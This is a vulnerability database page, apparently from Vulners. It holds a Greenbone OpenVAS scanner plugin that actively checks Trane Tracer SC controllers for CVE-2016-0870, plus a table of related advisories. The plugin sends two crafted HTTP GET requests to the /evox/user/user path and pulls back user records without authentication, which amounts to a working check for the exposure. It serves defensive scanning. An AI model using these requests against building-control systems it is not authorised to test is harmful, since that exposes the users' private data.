Lucene search
+L

Trane Tracer SC <= 4.2.1134 Information Exposure Vulnerability - Active Check

🗓️ 08 Aug 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 73 Views

Trane Tracer SC info exposure vulnerability (Remote) allows unauthorized party to obtain sensitive information from unprotected config file

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Trane Tracer SC Information Disclosure Vulnerability
19 Sep 201600:00
cnvd
CVE
CVE-2016-0870
19 Sep 201601:00
cve
Cvelist
CVE-2016-0870
19 Sep 201601:00
cvelist
EUVD
EUVD-2016-0881
7 Oct 202500:30
euvd
ICS
Trane Tracer SC Sensitive Information Exposure Vulnerability
19 Jun 201606:00
ics
NVD
CVE-2016-0870
19 Sep 201601:59
nvd
OpenVAS
Trane Tracer SC <= 4.2.1134 Information Exposure Vulnerability - Version Check
20 Sep 201600:00
openvas
OSV
CVE-2016-0870
19 Sep 201601:59
osv
Prion
Server side request forgery (ssrf)
19 Sep 201601:59
prion
Tenable Nessus
Trane Tracer SC Sensitive Information Disclosure (CVE-2016-0870)
23 Oct 202300:00
nessus
Rows per page
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/o:trane:tracer_sc_firmware";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.140281");
  script_version("2026-03-25T05:58:02+0000");
  script_tag(name:"last_modification", value:"2026-03-25 05:58:02 +0000 (Wed, 25 Mar 2026)");
  script_tag(name:"creation_date", value:"2017-08-08 08:52:34 +0700 (Tue, 08 Aug 2017)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2016-11-28 19:55:00 +0000 (Mon, 28 Nov 2016)");

  script_cve_id("CVE-2016-0870");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Trane Tracer SC <= 4.2.1134 Information Exposure Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2017 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_trane_tracer_sc_consolidation.nasl");
  script_mandatory_keys("trane/tracer/http/detected");
  script_require_ports("Services/www", 80);

  script_tag(name:"summary", value:"Trane Tracer SC is prone to an information exposure
  vulnerability.");

  script_tag(name:"vuldetect", value:"Sends two crafted HTTP GET requests and checks the
  responses.");

  script_tag(name:"insight", value:"The vulnerability allows an unauthorized party to obtain
  sensitive information from the contents of configuration files not protected by the web
  server.");

  script_tag(name:"impact", value:"An unauthorized attacker can exploit this vulnerability to read
  sensitive information from the contents of configuration files.");

  script_tag(name:"affected", value:"Trane Tracer SC version 4.2.1134 and prior.");

  script_tag(name:"solution", value:"Contact the vendor for an update.");

  script_xref(name:"URL", value:"https://www.cisa.gov/news-events/ics-advisories/icsa-16-259-03");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

req = http_get(port: port, item: "/evox/user/user");
res = http_keepalive_send_recv(port: port, data: req);

id = eregmatch(pattern: '([0-9]+)/" is="trane:SC/user/user_', string: res);
if (!isnull(id[1])) {
  url = "/evox/user/user/" + id[1];
  req = http_get(port: port, item: url);
  res = http_keepalive_send_recv(port: port, data: req);

  if ('name="lastName"' >< res && 'href="firstName/"' >< res) {
    report = "It was possible to extract user information at " +
             http_report_vuln_url(port: port, url: url, url_only: TRUE) + ":\n\nResult:\n\n" + res;

    security_message(port: port, data: report);
    exit(0);
  }
}

exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation